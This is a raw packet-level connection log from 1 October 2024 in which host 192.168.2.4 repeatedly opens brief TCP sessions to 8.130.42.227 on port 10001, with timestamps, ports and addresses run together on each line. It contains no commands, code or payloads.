                                                                Oct 1, 2024 09:18:30.110941887 CEST4981610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:30.111059904 CEST4981610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:30.115849018 CEST10001498168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:31.053788900 CEST10001498168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:31.053847075 CEST4981610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:31.053956985 CEST10001498168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:31.054001093 CEST4981610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:31.165095091 CEST4981610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:31.165549994 CEST4981710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:31.171366930 CEST10001498168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:31.171928883 CEST10001498178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:31.171988010 CEST4981710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:31.172106981 CEST4981710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:31.178555012 CEST10001498178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:32.116039991 CEST10001498178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:32.116132021 CEST10001498178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:32.116168976 CEST4981710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:32.116406918 CEST4981710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:32.257837057 CEST4981710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:32.258378029 CEST4981810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:32.264019012 CEST10001498178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:32.264156103 CEST10001498188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:32.264307976 CEST4981810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:32.264465094 CEST4981810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:32.269169092 CEST10001498188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:33.219223976 CEST10001498188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:33.219289064 CEST4981810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:33.219428062 CEST10001498188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:33.219480991 CEST4981810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:33.336802006 CEST4981810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:33.337193966 CEST4981910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:33.341680050 CEST10001498188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:33.341959953 CEST10001498198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:33.342047930 CEST4981910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:33.342219114 CEST4981910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:33.347044945 CEST10001498198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:34.334094048 CEST10001498198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:34.334291935 CEST10001498198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:34.334705114 CEST4981910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:34.334810972 CEST4981910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:34.339638948 CEST10001498198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:34.445702076 CEST4982010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:34.450680017 CEST10001498208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:34.450773001 CEST4982010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:34.450947046 CEST4982010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:34.455815077 CEST10001498208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:35.513272047 CEST10001498208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:35.513287067 CEST10001498208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:35.513295889 CEST10001498208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:35.513333082 CEST4982010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:35.513369083 CEST4982010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:35.513498068 CEST4982010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:35.519716024 CEST10001498208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:35.618963957 CEST4982110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:35.623918056 CEST10001498218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:35.624057055 CEST4982110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:35.624229908 CEST4982110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:35.629093885 CEST10001498218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:39.577821016 CEST10001498218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:39.577881098 CEST4982110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:39.577919006 CEST10001498218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:39.577967882 CEST4982110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:39.578145027 CEST4982110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:39.583003998 CEST10001498218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:39.699125051 CEST4982210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:39.704121113 CEST10001498228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:39.706851006 CEST4982210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:39.706851006 CEST4982210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:18:39.711755037 CEST10001498228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:40.809396029 CEST10001498228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:40.809422016 CEST10001498228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:18:40.809480906 CEST4982210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:10.142796040 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:10.142796040 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:10.147631884 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.239603996 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.239655972 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.239764929 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.239804983 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.243002892 CEST4984810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.247859955 CEST10001498488.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.399759054 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.404678106 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:11.404736042 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.404921055 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:11.409662008 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.383945942 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.383964062 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.386734962 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.386734962 CEST4984910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.391550064 CEST10001498498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.560586929 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.565453053 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:12.565803051 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.566149950 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:12.570997000 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.536622047 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.536698103 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.536760092 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.536806107 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.649327993 CEST4985010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.649756908 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.654346943 CEST10001498508.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.654588938 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:13.654696941 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.654870033 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:13.660190105 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.618599892 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.618616104 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.618716002 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.618716002 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.618880987 CEST4985110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.623709917 CEST10001498518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.774863958 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.779814005 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:14.779891014 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.780076981 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:14.784828901 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.770656109 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.770724058 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.775007963 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.775007963 CEST4985210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.779818058 CEST10001498528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.962827921 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.969052076 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:15.970726967 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.970824957 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:15.975732088 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:16.917601109 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:16.917649984 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:16.917942047 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:16.917985916 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.051831007 CEST4985310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.052295923 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.056850910 CEST10001498538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:17.057121992 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:17.057174921 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.060981989 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:17.066051960 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.005870104 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.006073952 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.007050037 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.008409977 CEST4985410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.013389111 CEST10001498548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.182761908 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.187864065 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:18.191450119 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.191450119 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:18.196357965 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.142124891 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.142158985 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.142194986 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.142247915 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.142343998 CEST4985510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.147134066 CEST10001498558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.259216070 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.264137983 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:19.264199972 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.264523983 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:19.269332886 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.207957983 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.208007097 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.210882902 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.210882902 CEST4985610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.215812922 CEST10001498568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.322662115 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.327600956 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:20.330912113 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.330912113 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:20.335696936 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.334633112 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.334691048 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.334808111 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.334887028 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.458328962 CEST4985710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.458683968 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.463212013 CEST10001498578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.463449955 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:21.463506937 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.464631081 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:21.469950914 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.470978975 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.471136093 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.475179911 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.475179911 CEST4985810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.480025053 CEST10001498588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.649112940 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.654309034 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:22.654994965 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.655162096 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:22.660196066 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.599531889 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.599551916 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.599601984 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.599714041 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.681149960 CEST4985910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.686049938 CEST10001498598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.870928049 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.876133919 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:23.878796101 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.878797054 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:23.884027958 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.837048054 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.837064028 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.837105036 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.837152004 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.837296963 CEST4986010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.843811035 CEST10001498608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.947304964 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.952342033 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:24.952402115 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.952651024 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:24.957484007 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:25.934140921 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:25.934766054 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:25.934897900 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:25.935338974 CEST4986110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:25.940253019 CEST10001498618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:26.086643934 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:26.091499090 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:26.091608047 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:26.094698906 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:26.099898100 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.087327003 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.087377071 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.087631941 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.087671041 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.196681023 CEST4986210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.197154045 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.201548100 CEST10001498628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.201997042 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:27.202058077 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.202214956 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:27.206932068 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.172127962 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.172149897 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.172842026 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.172842026 CEST4986310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.177858114 CEST10001498638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.292599916 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.297525883 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:28.300782919 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.300782919 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:28.305711031 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.264139891 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.264158964 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.264189005 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.264245033 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.264311075 CEST4986410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.269030094 CEST10001498648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.368805885 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.373811007 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:29.373869896 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.374037027 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:29.379060030 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.313374043 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.313394070 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.316787004 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.316787004 CEST4986510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.321688890 CEST10001498658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.432600021 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.437896967 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:30.438182116 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.438182116 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:30.443001986 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.392505884 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.392560959 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.392673016 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.392719984 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.508542061 CEST4986610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.508907080 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.513547897 CEST10001498668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.515166044 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:31.515227079 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.515368938 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:31.520289898 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.462285042 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.462373972 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:19:32.464935064 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:32.464935064 CEST4986710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:19:32.469882965 CEST10001498678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.885559082 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.885585070 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.885627031 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:04.885713100 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:04.885752916 CEST4989310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:04.890605927 CEST10001498938.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:04.993974924 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.000019073 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.000077009 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.000210047 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.004901886 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.942061901 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.942198038 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:05.944845915 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.944845915 CEST4989410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:05.949687004 CEST10001498948.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:06.058729887 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:06.063678026 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:06.063822985 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:06.064068079 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:06.068840981 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.026357889 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.026432037 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.026451111 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.026535988 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.026716948 CEST4989510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.031438112 CEST10001498958.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.153959990 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.158855915 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:07.158926964 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.162061930 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:07.166883945 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.116475105 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.116543055 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.116553068 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.116801023 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.117424011 CEST4989610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.122136116 CEST10001498968.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.228091955 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.234483957 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:08.234622955 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.235248089 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:08.241367102 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.189207077 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.189254999 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.189258099 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.189296961 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.189462900 CEST4989710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.194215059 CEST10001498978.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.306096077 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.310868979 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:09.310933113 CEST4989810001192.168.2.48.130.42.227
